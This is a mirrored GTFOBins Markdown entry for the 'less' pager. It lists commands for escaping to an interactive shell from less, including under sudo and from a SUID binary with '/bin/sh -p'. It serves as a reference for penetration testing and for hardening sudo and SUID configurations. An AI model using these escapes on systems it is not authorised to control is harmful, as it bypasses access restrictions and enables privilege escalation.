mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
18 lines
332 B
Markdown
18 lines
332 B
Markdown
|
---
|
||
|
functions:
|
||
|
exec-interactive:
|
||
|
- code: |
|
||
|
less /etc/profile
|
||
|
!/bin/sh
|
||
|
- code: |
|
||
|
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||
|
v
|
||
|
sudo-enabled:
|
||
|
- code: |
|
||
|
sudo less /etc/profile
|
||
|
!/bin/sh
|
||
|
suid-limited:
|
||
|
- code: |-
|
||
|
./less /etc/profile
|
||
|
!/bin/sh -p
|
||
|
---
|